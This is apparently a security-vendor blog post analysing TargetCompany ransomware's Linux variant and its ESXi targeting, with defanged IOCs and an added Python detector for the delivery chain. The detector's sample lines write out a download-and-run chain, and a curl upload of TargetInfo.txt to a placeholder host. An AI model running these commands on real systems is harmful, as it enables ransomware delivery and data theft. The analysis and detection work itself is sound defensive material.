TargetCompany’s Linux Variant Targets ESXi Environments

In this blog entry, our researchers provide an analysis of TargetCompany ransomware’s Linux variant and how it targets VMware ESXi environments using new methods for payload delivery and execution.

Summary

  • The TargetCompany ransomware group is now employing a new Linux variant that uses a custom shell script as a means of payload delivery and execution, a technique not seen in previous variants.
  • The shell script also exfiltrates the victim’s information to two different servers so the ransomware actors have a backup of the information.
  • The Linux-based variant can determine whether the victim’s machine is running in a VMWare ESXi environment.
  • By targeting ESXi servers, the ransomware actors behind TargetCompany aim to disrupt operations more effectively and increase their chances of a ransom payout.
  • The TargetCompany affiliate linked to the ransomware sample points to a broader campaign that targets expansive IT systems.

Discovered in June 2021, the TargetCompany ransomware is tracked by Trend Micro as “Water Gatpanapun” and has a leak site under the name “Mallox.” We have observed that the group’s activity is highest in Taiwan, India, Thailand, and South Korea this year.

Since its discovery, TargetCompany has been evolving its techniques to circumvent security defenses employed by organizations; one such technique is its use of a PowerShell script to bypass the Antimalware Scan Interface (AMSI), along with its abuse of fully undetectable (FUD) obfuscator packers.

Recently, our threat hunting team discovered a new variant of the TargetCompany ransomware specifically targeting Linux environments. This variant uses a shell script for payload delivery and execution (Figure 1). 

Figure 1. The infection chain of TargetCompany’s Linux variant

This technique has not yet been observed in previous TargetCompany variants, indicating that the ransomware group has been continuously evolving to employ more sophisticated methods in its future attacks. This recently found Linux variant aligns with the recent trend of ransomware groups extending their attacks to critical Linux environments, thereby potentially increasing the range of target victims.

TargetCompany’s Linux variant

This latest variant checks whether the executable is running with administrative rights (Figure 2). Otherwise, it will not continue its malicious routine. This signifies that a compromised or vulnerable device was successfully exploited to gain administrative rights to execute the ransomware payload.

Figure 2. Checking if the program is executed as superuser or root

Exfiltration of sensitive victim information 

After its execution, it drops a text file named TargetInfo.txt that contains victim information, as shown in Figure 3. The contents of TargetInfo.txt will be sent to a command-and-control (C&C) server, hxxp://91[BLOCKED], with the file name ap.php (Figure 4). This behavior is similar to that of the ransomware’s Windows variant.

Figure 3. Dropped “TargetInfo.txt” file

Figure 4. Disassembly of data exfiltration to a C&C server

Targeting ESXi environments

The threat actors behind TargetCompany have widened their targets to include virtualization servers, aiming to cause more damage and operational disruption. They also added a capability to detect if the machine is running in a VMWare ESXi environment, a platform commonly used for hosting critical virtualized infrastructure in organizations (Figure 5). Encrypting critical ESXi servers could also increase the likelihood of successful ransom payments.

The binary performs a check by executing the command “uname” to determine whether the machine is running in a VMWare ESXi environment. 

Figure 5. Checking if running on ESXi environment

If the system name matches “vmkernel”, this indicates that the machine is running in VMware’s ESXi hypervisor, and the binary enters “VM mode…” to encrypt files with the extensions in Figure 6.

Figure 6. VM-related extensions

File encryption and ransom note deployment

After its encryption routine, this variant appends the extension “.locked” on encrypted files and drops a ransom note named HOW TO DECRYPT.txt (Figure 7). This is a departure from the usual extension and ransom note file name of its Windows variant (Figure 8).

Figure 7. Appended “.locked” extension on encrypted files

Figure 8. Ransom note

Execution of TargetCompany using a shell script

Upon further investigation, we found that a shell script was used to download and execute the ransomware payload hosted at a designated URL. Figure 9 shows the shell script custom-made by the threat actors specifically to execute this TargetCompany variant. It first checks for the existence of the TargetInfo.txt file and terminates if the file is found.

Figure 9. Custom shell script for delivery and execution of payload

The script attempts to download the TargetCompany payload from the download URL using “wget” or “curl,” whichever of the two commands succeeds. The payload is then made executable using the command “chmod +x x” and executed in the background using “nohup ./x” (Figure 10).

Figure 10. Code snippet for downloading and executing TargetCompany

The custom shell script is also capable of exfiltrating data to a different server. Once the ransomware payload performs its malicious routine, the script will read the contents of the dropped text file TargetInfo.txt and upload it to another URL using “wget” or “curl”. 

Figure 11. Code snippet of data exfiltration to a C&C server

This variant exfiltrates victim information to two different servers. It is possible that the implantation of this technique is part of TargetCompany threat actors’ strategy to improve redundancy and have a backup in case a server goes offline or is compromised.

After the ransomware performs its routine, the script deletes the TargetCompany payload using the command “rm -f x”.
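As an added example (not code from the post, the script, or Trend Micro), the following Python checker looks for the delivery chain described above in collected command lines such as shell history or process telemetry: a wget/curl download, chmod +x, background execution with nohup, an upload of TargetInfo.txt, and rm -f of the same payload file. The sample lines, host and paths in it are constructed placeholders, not the actual infrastructure from this campaign.

```python
import re

# Stage patterns for the delivery chain described above: download with wget/curl,
# chmod +x, background execution via nohup, upload of TargetInfo.txt, rm -f.
STAGES = {
    "download": re.compile(r"\b(?:wget|curl)\b.*https?://"),
    "make_executable": re.compile(r"\bchmod\s+\+x\s+(\S+)"),
    "background_exec": re.compile(r"\bnohup\s+\./(\S+)"),
    "exfiltrate": re.compile(r"\b(?:wget|curl)\b.*TargetInfo\.txt"),
    "cleanup": re.compile(r"\brm\s+-f\s+(\S+)"),
}
REQUIRED = ("download", "make_executable", "background_exec", "cleanup")

# Constructed sample lines (e.g. from shell history or process telemetry);
# the host and paths are placeholders, not the post's real infrastructure.
SAMPLE_MALICIOUS = [
    "cd /tmp",
    "wget http://198.51.100.7:8168/tmp/x || curl -o x http://198.51.100.7:8168/tmp/x",
    "chmod +x x",
    "nohup ./x &",
    "curl -X POST --data-binary @TargetInfo.txt http://198.51.100.7:8168/post.php",
    "rm -f x",
]
SAMPLE_BENIGN = [
    "wget https://example.org/pkg.tar.gz",
    "tar xf pkg.tar.gz",
    "rm -f pkg.tar.gz",
]

def match_chain(cmdlines):
    """Return (payload_name, hits). hits maps each matched stage to the first
    command line that triggered it; payload_name is None unless every stage in
    REQUIRED matched and the nohup/rm stages act on the file that was chmod'ed."""
    hits, payload = {}, None
    for line in cmdlines:
        for stage, rx in STAGES.items():
            m = rx.search(line)
            if not m:
                continue
            if stage == "download" and "TargetInfo.txt" in line:
                continue  # that is the upload, handled by the "exfiltrate" stage
            if stage == "make_executable":
                payload = m.group(1)
            elif stage in ("background_exec", "cleanup") and m.group(1) != payload:
                continue  # acts on an unrelated file, not part of this chain
            hits.setdefault(stage, line)
    complete = all(s in hits for s in REQUIRED)
    return (payload if complete else None), hits
```

A hit on all four REQUIRED stages for one file name is the signal; the `exfiltrate` stage is reported when present but is not required, since the upload may fail or be observed on the network side instead.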

This technique is very common, but it still poses a significant challenge for defenders. Security practitioners will have limited artifacts to work with during investigation and incident response, making it difficult to understand the overall impact of the attack.

Infrastructure

The IP address used to deliver the payload and exfiltrate a victim’s system information has not yet been observed in previous TargetCompany campaigns. Based on research, this IP address is hosted by China Mobile Communications, an internet service provider (ISP) in China.

Since the IP address is hosted by a service provider, there is a possibility that the IP address used by TargetCompany’s threat actors was rented to host their malicious payload (Figure 12).

Figure 12. HTTPS certificate

The certificate was also registered recently and is valid for only three months, indicating that it might be intended for short-term use. Upon visiting the IP address, we found the following homepage, which is similar to the Tongda Xinke OA login interface (Figure 13).

Figure 13. Homepage of the URL used to host the ransomware payload

Affiliate “vampire”

The specific sample shown in Figure 14 is associated with an affiliate called “vampire,” based on the contents it sends to its C&C server. This indicates broader campaigns involving high ransom demands and expansive IT system targeting. This affiliate is possibly connected to the affiliate included in a blog entry posted by Sekoia.

Figure 14. “Vampire”-related strings

Conclusion

Malicious actors are consistently refining their attacks, as evidenced by the emergence of TargetCompany’s new Linux variant, which allows the ransomware to expand its pool of potential victims by targeting VMWare ESXi environments. In light of this, staying vigilant against emerging ransomware variants should remain paramount among defenders. Implementing tried-and-tested cybersecurity measures can mitigate the risk of falling victim to ransomware attempts and protect the data integrity of an organization’s assets. Organizations can implement best practices by:

  • Enabling multifactor authentication (MFA) to prevent attackers from performing lateral movement inside a network.
  • Adhering to the 3-2-1 rule when backing up important files: creating three backup copies on two different file formats, with one of the copies stored in a separate location.
  • Patching and updating systems regularly; it’s important to keep operating systems and applications up to date and maintain patch management protocols that can deter malicious actors from exploiting any software vulnerabilities.

Trend Vision One™ hunting query

  • malName:*Linux.TARGETCOMP* AND eventName:MALWARE_DETECTION

Indicators of compromise (IOCs)

Hashes

| Hash | Detection | Description |
| --- | --- | --- |
| dffa99b9fe6e7d3e19afba38c9f7ec739581f656 | Ransom.Linux.TARGETCOMP.YXEEQT | TargetCompany Linux variant |
| 2b82b463dab61cd3d7765492d7b4a529b4618e57 | Trojan.SH.TARGETCOMP.THEAGBD | Shell script |
| 9779aa8eb4c6f9eb809ebf4646867b0ed38c97e1 | Ransom.Win64.TARGETCOMP.YXECMT | TargetCompany sample related to affiliate “vampire” |
| 3642996044cd85381b19f28a9ab6763e2bab653c | Ransom.Win64.TARGETCOMP.YXECFT | TargetCompany sample related to affiliate “vampire” |
| 4cdee339e038f5fc32dde8432dc3630afd4df8a2 | Ransom.Win32.TARGETCOMP.SMYXCLAZ | TargetCompany sample related to affiliate “vampire” |
| 0f6bea3ff11bb56c2daf4c5f5c5b2f1afd3d5098 | Ransom.Win32.TARGETCOMP.SMYXCLAZ | TargetCompany sample related to affiliate “vampire” |

URLs

| URL | Detection | Description |
| --- | --- | --- |
| hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/x.sh | 90 – Untested | Download URL of the shell script |
| hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/x | 79 – Disease Vector | Download URL of the ransomware payload |
| hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/post.php | 79 – Disease Vector | Upload URL |

MITRE ATT&CK tactics and techniques

| Tactic | Technique | ID |
| --- | --- | --- |
| Defense Evasion | File Deletion | T1070.004 |
| Discovery | System Information Discovery | T1082 |
| Execution | Command and Scripting Interpreter: Unix Shell | T1059.004 |
| Command and Control | Ingress Tool Transfer | T1105 |
| Exfiltration | Exfiltration over Alternative Protocol | T1408 |
| Exfiltration | Exfiltration over C2 Channel | T1041 |
| Impact | Data Encrypted for Impact | T1486 |